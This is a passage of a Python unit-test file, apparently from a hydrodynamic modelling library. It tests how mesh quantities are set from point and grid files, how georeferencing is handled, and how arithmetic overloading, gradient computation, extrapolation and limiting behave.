#print quantity.domain.get_vertex_coordinates()
#print quantity.domain.get_nodes()
# Check that values can be set from file
quantity.set_values(filename=ptsfile,
polygon=polygon,
location='unique vertices',
alpha=0)
# Get indices for vertex coordinates in polygon
indices = inside_polygon(quantity.domain.get_vertex_coordinates(),
polygon)
points = num.take(quantity.domain.get_vertex_coordinates(), indices)
answer = linear_function(points)
#print quantity.vertex_values.flat
#print answer
# Check vertices in polygon have been set
assert num.allclose(num.take(quantity.vertex_values.flat, indices),
answer)
# Check vertices outside polygon are zero
indices = outside_polygon(quantity.domain.get_vertex_coordinates(),
polygon)
assert num.allclose(num.take(quantity.vertex_values.flat, indices),
0.0)
#Cleanup
import os
os.remove(ptsfile)
def test_cache_test_set_values_from_file(self):
# FIXME (Ole): What is this about?
# I don't think it checks anything new
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
georef = Geo_reference(56, 0, 0)
data_geo_spatial = Geospatial_data(data_points,
geo_reference=georef)
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
# Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
# Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att,
alpha=0,
use_cache=True,
verbose=False)
answer = linear_function(quantity.domain.get_vertex_coordinates())
assert num.allclose(quantity.vertex_values.flat, answer)
# Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile,
alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
# Check cache
quantity.set_values(filename=ptsfile,
attribute_name=att,
alpha=0,
use_cache=True,
verbose=False)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_lat_long(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" lat,long," + att + " \n")
for data_point, attribute in zip(data_points, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=txt_file,
attribute_name=att,
alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
def test_set_values_from_lat_long_2(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" lat,long," + att + " \n")
for data_point, attribute in zip(data_points, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=txt_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
def test_set_values_from_UTM_pts(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(points_UTM, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
pts_file = tempfile.mktemp(".pts")
convert = Geospatial_data(txt_file)
convert.export_points_file(pts_file)
#Check that values can be set from file
quantity.set_values_from_file(pts_file, att, 0,
'vertices', None)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file
quantity.set_values(filename=pts_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
os.remove(pts_file)
def test_set_values_from_UTM_pts_verbose(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(points_UTM, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
pts_file = tempfile.mktemp(".pts")
convert = Geospatial_data(txt_file)
convert.export_points_file(pts_file)
#Check that values can be set from file
quantity.set_values_from_file(pts_file, att, 0,
'vertices', None, verbose=False,
max_read_lines=2)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file
quantity.set_values(filename=pts_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
os.remove(pts_file)
def test_set_values_from_file_with_georef1(self):
#Mesh in zone 56 (absolute coords)
x0 = 314036.58727982
y0 = 6224951.2960092
a = [x0+0.0, y0+0.0]
b = [x0+0.0, y0+2.0]
c = [x0+2.0, y0+0.0]
d = [x0+0.0, y0+4.0]
e = [x0+2.0, y0+2.0]
f = [x0+4.0, y0+0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
#absolute going in ..
mesh4 = Generic_Domain(points, elements,
geo_reference=Geo_reference(56, 0, 0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
#Get (enough) datapoints (relative to georef)
data_points_rel = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points_rel,
geo_reference=Geo_reference(56, x0, y0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#file = open(ptsfile, 'r')
#lines = file.readlines()
#file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_file_with_georef2(self):
#Mesh in zone 56 (relative coords)
x0 = 314036.58727982
y0 = 6224951.2960092
#x0 = 0.0
#y0 = 0.0
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
mesh4 = Generic_Domain(points, elements,
geo_reference=Geo_reference(56, x0, y0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
#Get (enough) datapoints
data_points = [[x0+0.66666667, y0+0.66666667],
[x0+1.33333333, y0+1.33333333],
[x0+2.66666667, y0+0.66666667],
[x0+0.66666667, y0+2.66666667],
[x0+0.0, y0+1.0],
[x0+0.0, y0+3.0],
[x0+1.0, y0+0.0],
[x0+1.0, y0+1.0],
[x0+1.0, y0+2.0],
[x0+1.0, y0+3.0],
[x0+2.0, y0+1.0],
[x0+3.0, y0+0.0],
[x0+3.0, y0+1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.
get_vertex_coordinates(absolute=True))
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_utm_grid_file(self):
x0 = 0.0
y0 = 0.0
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
mesh4 = Generic_Domain(points, elements)
# geo_reference = Geo_reference(56, x0, y0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
""" Format of asc file
ncols 11
nrows 12
xllcorner 240000
yllcorner 7620000
cellsize 6000
NODATA_value -9999
"""
ncols = 11 # Nx
nrows = 12 # Ny
xllcorner = x0
yllcorner = y0
cellsize = 1.0
NODATA_value = -9999
#xllcorner = 0
#yllcorner = 100
#cellsize = 10
#NODATA_value = -9999
#Create .asc file
#txt_file = tempfile.mktemp(".asc")
txt_file = 'test_asc.asc'
datafile = open(txt_file, "w")
datafile.write('ncols '+str(ncols)+"\n")
datafile.write('nrows '+str(nrows)+"\n")
datafile.write('xllcorner '+str(xllcorner)+"\n")
datafile.write('yllcorner '+str(yllcorner)+"\n")
datafile.write('cellsize '+str(cellsize)+"\n")
datafile.write('NODATA_value '+str(NODATA_value)+"\n")
x = num.linspace(xllcorner, xllcorner+(ncols-1)*cellsize, ncols)
y = num.linspace(yllcorner, yllcorner+(nrows-1)*cellsize, nrows)
points = axes2points(x, y)
#print points
#print x.shape, x
#print y.shape, y
datavalues = linear_function(points)
#print datavalues
datavalues = datavalues.reshape(nrows, ncols)
#print datavalues
#print datavalues.shape
for row in datavalues:
#print row
datafile.write(" ".join(str(elem) for elem in row) + "\n")
datafile.close()
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file,
location='vertices',
indices=None,
verbose=False)
# check order of vertices
answer = [[6., 0., 2.],
[6., 2., 8.],
[8., 2., 4.],
[12., 6., 8.]]
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values, answer)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(0.0)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file,
location='centroids',
indices=None,
verbose=False)
#print quantity.vertex_values
#print quantity.centroid_values
answer = [2.66666667, 5.33333333, 4.66666667, 8.66666667]
assert num.allclose(quantity.centroid_values, answer)
# check dem file
# use the same reference solution used above for testing
# convert test_asc.asc file to .dem file
txt_file_prj = 'test_asc.prj'
fid = open(txt_file_prj, 'w')
fid.write("""Projection UTM
Zone 56
Datum WGS84
Zunits NO
Units METERS
Spheroid WGS84
Xshift 0.0000000000
Yshift 10000000.0000000000
Parameters
""")
fid.close()
txt_file_dem = 'test_asc.dem'
asc2dem(name_in=txt_file, name_out='test_asc',
use_cache=False, verbose=False)
quantity.set_values(0.0)
quantity.set_values(filename=txt_file_dem,
location='vertices',
indices=None,
verbose=False)
# check order of vertices
answer = [[6., 0., 2.],
[6., 2., 8.],
[8., 2., 4.],
[12., 6., 8.]]
#print quantity.vertex_values
#print quantity.vertex_values, 'vertex values'
assert num.allclose(quantity.vertex_values, answer)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(0.0)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file_dem,
location='centroids',
indices=None,
verbose=False)
#print quantity.vertex_values
#print quantity.centroid_values , 'centroid values'
answer = [2.66666667, 5.33333333, 4.66666667, 8.66666667]
assert num.allclose(quantity.centroid_values, answer)
#Cleanup
#import os
try:
os.remove(txt_file)
os.remove(txt_file_prj)
os.remove(txt_file_dem)
except:
pass
def test_set_values_from_quantity(self):
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values(quantity=quantity1)
assert num.allclose(quantity2.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2.set_values(quantity=2*quantity1)
assert num.allclose(quantity2.vertex_values,
[[2, 0, 4], [2, 4, 8], [8, 4, 10], [6, 2, 8]])
quantity2.set_values(quantity=2*quantity1 + 3)
assert num.allclose(quantity2.vertex_values,
[[5, 3, 7], [5, 7, 11], [11, 7, 13], [9, 5, 11]])
#Check detection of quantity as first orgument
quantity2.set_values(2*quantity1 + 3)
assert num.allclose(quantity2.vertex_values,
[[5, 3, 7], [5, 7, 11], [11, 7, 13], [9, 5, 11]])
def Xtest_set_values_from_quantity_using_polygon(self):
"""test_set_values_from_quantity_using_polygon(self):
Check that polygon can be used to restrict set_values when
using another quantity as argument.
"""
# Create restricting polygon (containing node #4 (2,2) and
# centroid of triangle #1 (bce)
polygon = [[1.0, 1.0], [4.0, 1.0],
[4.0, 4.0], [1.0, 4.0]]
assert num.allclose(inside_polygon(self.mesh4.nodes, polygon), 4)
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values(quantity=quantity1,
polygon=polygon)
msg = 'Only node #4(e) at (2,2) should have values applied '
assert num.allclose(quantity2.vertex_values,
[[0, 0, 0], [0, 0, 4], [4, 0, 0], [0, 0, 4]]), msg
#bac, bce, ecf, dbe
def test_overloading(self):
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
quantity3 = Quantity(self.mesh4)
quantity3.set_values([[2, 2, 2], [7, 8, 9], [7, 6, 3], [3, 8, -8]],
location='vertices')
# Negation
Q = -quantity1
assert num.allclose(Q.vertex_values, -quantity1.vertex_values)
assert num.allclose(Q.centroid_values, -quantity1.centroid_values)
assert num.allclose(Q.edge_values, -quantity1.edge_values)
# Addition
Q = quantity1 + 7
assert num.allclose(Q.vertex_values, quantity1.vertex_values + 7)
assert num.allclose(Q.centroid_values, quantity1.centroid_values + 7)
assert num.allclose(Q.edge_values, quantity1.edge_values + 7)
Q = 7 + quantity1
assert num.allclose(Q.vertex_values, quantity1.vertex_values + 7)
assert num.allclose(Q.centroid_values, quantity1.centroid_values + 7)
assert num.allclose(Q.edge_values, quantity1.edge_values + 7)
Q = quantity1 + quantity2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values + quantity2.vertex_values)
assert num.allclose(Q.centroid_values,
quantity1.centroid_values + quantity2.centroid_values)
assert num.allclose(Q.edge_values,
quantity1.edge_values + quantity2.edge_values)
Q = quantity1 + quantity2 - 3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values + quantity2.vertex_values - 3)
Q = quantity1 - quantity2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values - quantity2.vertex_values)
#Scaling
Q = quantity1*3
assert num.allclose(Q.vertex_values, quantity1.vertex_values*3)
assert num.allclose(Q.centroid_values, quantity1.centroid_values*3)
assert num.allclose(Q.edge_values, quantity1.edge_values*3)
Q = 3*quantity1
assert num.allclose(Q.vertex_values, quantity1.vertex_values*3)
#Multiplication
Q = quantity1 * quantity2
#print Q.vertex_values
#print Q.centroid_values
#print quantity1.centroid_values
#print quantity2.centroid_values
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values)
#Linear combinations
Q = 4*quantity1 + 2
assert num.allclose(Q.vertex_values,
4*quantity1.vertex_values + 2)
Q = quantity1*quantity2 + 2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values + 2)
Q = quantity1*quantity2 + quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ quantity3.vertex_values)
Q = quantity1*quantity2 + 3*quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ 3*quantity3.vertex_values)
Q = quantity1*quantity2 + 3*quantity3 + 5.0
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ 3*quantity3.vertex_values + 5)
Q = quantity1*quantity2 - quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
- quantity3.vertex_values)
Q = 1.5*quantity1*quantity2 - 3*quantity3 + 5.0
assert num.allclose(Q.vertex_values,
1.5*quantity1.vertex_values * quantity2.vertex_values
- 3*quantity3.vertex_values + 5)
#Try combining quantities and arrays and scalars
Q = 1.5*quantity1*quantity2.vertex_values -\
3*quantity3.vertex_values + 5.0
assert num.allclose(Q.vertex_values,
1.5*quantity1.vertex_values * quantity2.vertex_values
- 3*quantity3.vertex_values + 5)
#Powers
Q = quantity1**2
assert num.allclose(Q.vertex_values, quantity1.vertex_values**2)
Q = quantity1**2 + quantity2**2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values**2
+ quantity2.vertex_values**2)
Q = (quantity1**2 + quantity2**2)**0.5
assert num.allclose(Q.vertex_values,
(quantity1.vertex_values**2 +
quantity2.vertex_values**2)**0.5)
def test_compute_gradient(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (2,0) at mid triangle
quantity.set_values([2.0, 4.0, 6.0, 2.0],
location='centroids')
#Gradients
quantity.compute_gradients()
a = quantity.x_gradient
b = quantity.y_gradient
#print self.mesh4.centroid_coordinates
#print a, b
#The central triangle (1)
#(using standard gradient based on neigbours controid values)
assert num.allclose(a[1], 2.0)
assert num.allclose(b[1], 0.0)
#Left triangle (0) using two point gradient
#q0 = q1 + a*(x0-x1) + b*(y0-y1) <=>
#2 = 4 + a*(-2/3) + b*(-2/3)
assert num.allclose(a[0] + b[0], 3)
#From orthogonality (a*(y0-y1) + b*(x0-x1) == 0)
assert num.allclose(a[0] - b[0], 0)
#Right triangle (2) using two point gradient
#q2 = q1 + a*(x2-x1) + b*(y2-y1) <=>
#6 = 4 + a*(4/3) + b*(-2/3)
assert num.allclose(2*a[2] - b[2], 3)
#From orthogonality (a*(y1-y2) + b*(x2-x1) == 0)
assert num.allclose(a[2] + 2*b[2], 0)
#Top triangle (3) using two point gradient
#q3 = q1 + a*(x3-x1) + b*(y3-y1) <=>
#2 = 4 + a*(-2/3) + b*(4/3)
assert num.allclose(a[3] - 2*b[3], 3)
#From orthogonality (a*(y1-y3) + b*(x3-x1) == 0)
assert num.allclose(2*a[3] + b[3], 0)
#print a, b
quantity.extrapolate_second_order()
#Apply q(x,y) = qc + a*(x-xc) + b*(y-yc)
assert num.allclose(quantity.vertex_values[0, :], [3., 0., 3.])
assert num.allclose(quantity.vertex_values[1, :], [
4./3, 16./3, 16./3])
#a = 1.2, b=-0.6
#q(4,0) = 6 + a*(4 - 8/3) + b*(-2/3)
assert num.allclose(quantity.vertex_values[2, 2], 8)
def test_get_gradients(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (2,0) at mid triangle
quantity.set_values([2.0, 4.0, 6.0, 2.0],
location='centroids')
#Gradients
quantity.compute_gradients()
a, b = quantity.get_gradients()
#print self.mesh4.centroid_coordinates
#print a, b
#The central triangle (1)
#(using standard gradient based on neigbours controid values)
assert num.allclose(a[1], 2.0)
assert num.allclose(b[1], 0.0)
#Left triangle (0) using two point gradient
#q0 = q1 + a*(x0-x1) + b*(y0-y1) <=>
#2 = 4 + a*(-2/3) + b*(-2/3)
assert num.allclose(a[0] + b[0], 3)
#From orthogonality (a*(y0-y1) + b*(x0-x1) == 0)
assert num.allclose(a[0] - b[0], 0)
#Right triangle (2) using two point gradient
#q2 = q1 + a*(x2-x1) + b*(y2-y1) <=>
#6 = 4 + a*(4/3) + b*(-2/3)
assert num.allclose(2*a[2] - b[2], 3)
#From orthogonality (a*(y1-y2) + b*(x2-x1) == 0)
assert num.allclose(a[2] + 2*b[2], 0)
#Top triangle (3) using two point gradient
#q3 = q1 + a*(x3-x1) + b*(y3-y1) <=>
#2 = 4 + a*(-2/3) + b*(4/3)
assert num.allclose(a[3] - 2*b[3], 3)
#From orthogonality (a*(y1-y3) + b*(x3-x1) == 0)
assert num.allclose(2*a[3] + b[3], 0)
def test_second_order_extrapolation2(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,1), f(x) = 3x+y
quantity.set_values([2.0+2.0/3, 4.0+4.0/3, 8.0+2.0/3, 2.0+8.0/3],
location='centroids')
#Gradients
quantity.compute_gradients()
a = quantity.x_gradient
b = quantity.y_gradient
#print a, b
assert num.allclose(a[1], 3.0)
assert num.allclose(b[1], 1.0)
#Work out the others
quantity.extrapolate_second_order()
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values[1, 0], 2.0)
assert num.allclose(quantity.vertex_values[1, 1], 6.0)
assert num.allclose(quantity.vertex_values[1, 2], 8.0)
def test_backup_saxpy_centroid_values(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,1), f(x) = 3x+y
c_values = num.array([2.0+2.0/3, 4.0+4.0/3, 8.0+2.0/3, 2.0+8.0/3])
d_values = num.array([1.0, 2.0, 3.0, 4.0])
quantity.set_values(c_values, location='centroids')
#Backup
quantity.backup_centroid_values()
#print quantity.vertex_values
assert num.allclose(quantity.centroid_values,
quantity.centroid_backup_values)
quantity.set_values(d_values, location='centroids')
quantity.saxpy_centroid_values(2.0, 3.0)
assert num.allclose(quantity.centroid_values,
2.0*d_values + 3.0*c_values)
def test_first_order_extrapolator(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Extrapolate
quantity.extrapolate_first_order()
#Check that gradient is zero
a, b = quantity.get_gradients()
assert num.allclose(a, [0, 0, 0, 0])
assert num.allclose(b, [0, 0, 0, 0])
#Check vertices but not edge values
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])
def test_second_order_extrapolator(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,0) at mid triangle
quantity.set_values([2.0, 4.0, 8.0, 2.0],
location='centroids')
quantity.extrapolate_second_order()
quantity.limit()
#Assert that central triangle is limited by neighbours
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[0, 0]
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[3, 1]
assert quantity.vertex_values[1, 1] <= quantity.vertex_values[2, 1]
assert quantity.vertex_values[1, 1] >= quantity.vertex_values[0, 2]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[2, 0]
assert quantity.vertex_values[1, 2] >= quantity.vertex_values[3, 1]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_vertices_by_all_neighbours(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_vertices_by_all_neighbours()
#Assert that central triangle is limited by neighbours
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[0, 0]
assert quantity.vertex_values[1, 0] <= quantity.vertex_values[3, 1]
assert quantity.vertex_values[1, 1] <= quantity.vertex_values[2, 1]
assert quantity.vertex_values[1, 1] >= quantity.vertex_values[0, 2]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[2, 0]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[3, 1]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_edges_by_all_neighbours(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_edges_by_all_neighbours()
#Assert that central triangle is limited by neighbours
assert quantity.edge_values[1, 0] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 0] >= quantity.centroid_values[0]
assert quantity.edge_values[1, 1] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 1] >= quantity.centroid_values[0]
assert quantity.edge_values[1, 2] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 2] >= quantity.centroid_values[0]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
